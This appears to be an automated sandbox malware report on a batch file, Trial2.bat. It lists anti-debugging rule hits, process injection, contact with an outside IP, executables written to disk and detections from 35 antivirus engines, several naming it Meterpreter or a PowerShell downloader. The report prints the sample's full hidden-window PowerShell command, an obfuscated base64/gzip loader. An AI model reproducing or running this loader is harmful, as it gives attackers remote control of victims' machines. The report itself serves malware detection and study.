description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Communicates with host for which no DNS query was performed (1 event)

host

89.197.154.116

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMH{1}4mYCA71XeY+jxhL/P1K+A4osGWs9NvjYnVlppQfY+IjBB9j4iBW1oQ1tGvBCM5jJy3d/hY85tLPRJlJeS9Y03VXVVb86Z5+GNiNRyGXpp+GS++Pnn7jrmqAYBRxfyo1{1}v8qV8L3cECov16V0+vvhE/eF4zfS8diJAkTC7efPShrHOGSX71oPMylJcLCjBCd8hfsvZ3k4xn'+'fj3QHbjPuDK/1e69Foh+iVLFeQ7WHuTgqd4m4U{1}ajQrmYcKWF8+bffypXNnbitdb+miCZ8{1}cgThoOaQ{1}m5wv1ZKR408yPmyxqx4yiJ9qxmkbDZqM3DBO'+'{1}xDtIe'+'sYaZFzlJGax5sSfGLI3Dq1mFnAsVX4btJI5syXFinCTlKrcpXthst//hN9fnZ{1}nISIBrg5DhODoaOH4kNk5qfRQ6FM/wfgtcBotJ6G4rFSB7jHzMl8KU0ir3d8TwOs5u4P0oE/+aCagmLK5Uwa/vGapFTkrxhbX8jq'+'bnYKjAeg4IwPDPAsb9LY6C{1}TtB9HJwW5vzDQad+UmUkDPrF06ocho8jlgU5/BZMuMUV7bPiHOlXHECq/qj4sQbL3C65pHC0WYREWf7IuBNDJS+RgXJ9+O5g/ckxJ08RAGxbyHLv+cVvKf4DEjtRqaDfnz5eoGdDqbYRayAuQiOb9i6AWHPvHJKqINjyQbPJqAVOL3yVpmL5/jyINRwAOhdviFaS3tIFHyjviZHfnu9+AaiskJRklS5SQqZalc5A'+'yOKnSonhQm5'+'Xkkpi87b8ou6WkoZsVHCbuK{1}lTdgXh9VojBhcWqDVwEA0zhimyBa4FHl+sTBcm4Q9/Z4+V00FEQpZA9IegRvwEmBgsGKWIlBz0tcVGoGZoPgSHEAROfCoVLkQpm4Jsk5upCLnfK7et4S4RL1BSw3PF5pCb4{1}aMSq3ILEDIpQAXERW/9MiW/rD{1}ijxPjqGv6WXhs5Z0UGlA5J10+KIL1idEYkZoCGGkeBjBL8sXWpNPwv9TGZSLBWg5Bqzt'+'An4iCDnw'+'a/OWkOIm1/P'+'{1}FCFGi{1}kkx66r1EMjez73XJdoYOfjC'+'AbrpoMWUi9ad'+'EkFue'+'LQtmsRddV3J0OH'+'NXnk{1}FSadfN1aJQLK+pdkd+SlrJBCqrVZ/KUjNZmvcFHzAbwV8PvAFJDuNYA8ldTySB4ksDGh3qMx{1}VkNdW7Rfb6ne3ooS4+OqU6/XHxzUa1NHkiOnQVO0mEVm3w7ken{1}hOcyci7o5/0C6hZ{1}m9fA'+'RWadk'+'ZdyLo4Pk/qo6x10we3SammvSqauZUqp1EncBcvTD9NOg7zZ0xXenSznb9RbLtTUcoeX0UTe15uigNQaKNzLUmW4qmbvr0XhtyP{1}1pce7HHgaXr5riH'+'T05LfgrVTv{1}OJYabU0QzZX1tqzA/9FTnfhr/P7tp63stGhm+lPA3jfl1DnaGG0r4sL3UQu{1}NEgSt+VpI96VpjzuFuum451aq477mkuLjSbqie7MVwsnyiZLxeTqa+v54DHrtHWUOAcVv4sm89PaCao1shq59Zi3XYa3dPsSc+1udq1G85q3fHEOZWPS0FtaD0{1}RUH7uGtKud0ZZsinQ109ooUgtkzLl+Y9b0nW9V79wRqeqB5J0jDyVNBTdMxFcIgXRusT3FnIPe7PfhDX0Wi6WmHwDcSKqPbIoAumoK6Z6bhTF+cPYgt7o8I45MuRJMOmBwaD9+'+'YNb3VUJxTkgZzxsC06kaTAvapbSP7VInhUF1dLydE+jOSs3ynktxeHzvK'+'DVy/WuOOnmukD3l1RV1onzVxJaV0RI7r+KqmTujj98uUXyKbNnISs{1}diW4qzoNz//VNo3'+'D68T6nv9VENx4iEKiQZ98lbv1C'+'hWr41vEpGCg+cvg5SP4xBTGDxgNLmVConSyC56L/RI6PqXXlyMBvPBWaf3dhXumbDy0pBvR58/r0FJKD'+'3nslAb4dBlXlU4NQUBWqlwElrnGvPjtinRMecv0qpFNz6j8yyfnuWDSLLneP7/gBgMXgw6wP'+'cw+x588LQP9Rr6x6WIFiDKUURfQ3i17Dke3iAI0Ilg/aaYuSBSQMAd/sqVWDGOvB5vSu549S/HzrUZePDH+evYeTn7i9sfiiehekHnm+O3B6+a6L+JgIUIA1IDehrFlzHrPSCu+fLKw+AcyIX9dRX/fYxTdqfDLHvuqv'+'8DWVRtAvsMAAA{0}')-f'=','2')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2740 resumed a thread in remote process 2808
NtResumeThread Sept. 30, 2024, 11:23 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2808	1	0	0

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Lionic	Trojan.Script.PowerShell.4!c
CTX	powershell.trojan.generic
CAT-QuickHeal	Script.Trojan.42447
Skyhigh	PS/Injector.d
ALYac	Trojan.Script.905440
VIPRE	Trojan.Script.905440
Sangfor	Trojan.Generic-Script.Save.dd237b49
Arcabit	Trojan.Script.DDD0E0
Symantec	Meterpreter
ESET-NOD32	PowerShell/Agent.WO
Avast	VBS:Obfuscated-GQ [Cryp]
Cynet	Malicious (score: 99)
Kaspersky	Trojan.PowerShell.Agent.v
BitDefender	Trojan.Script.905440
NANO-Antivirus	Trojan.Text.Downloader.fqlyhy
MicroWorld-eScan	Trojan.Script.905440
Emsisoft	Trojan.Script.905440 (B)
F-Secure	Trojan.TR/PowerShell.Gen
DrWeb	PowerShell.DownLoader.36
Sophos	Mal/PSDL-B
Ikarus	Win32.Outbreak
FireEye	Trojan.Script.905440
Google	Detected
Avira	TR/PowerShell.Gen
Gridinsoft	Trojan.U.Gen.tr
Xcitium	TrojWare.VBS.Agent.NUI@8a4oj4
Microsoft	Trojan:Script/Wacatac.B!ml
ZoneAlarm	Trojan.PowerShell.Agent.v
GData	Trojan.Script.905440
AhnLab-V3	BAT/Agent
McAfee	PS/Injector.d
Tencent	Unk.Win32.Script.403896
huorong	Trojan/PS.Agent.k
Fortinet	PowerShell/Agent.WO!tr
AVG	VBS:Obfuscated-GQ [Cryp]

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (11 events)

dead_host	192.168.56.101:49181
dead_host	192.168.56.101:49180
dead_host	192.168.56.101:49170
dead_host	192.168.56.101:49179
dead_host	192.168.56.101:49178
dead_host	192.168.56.101:49174
dead_host	192.168.56.101:49176
dead_host	192.168.56.101:49173
dead_host	192.168.56.101:49183
dead_host	89.197.154.116:7810
dead_host	192.168.56.101:49182

Trial2.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All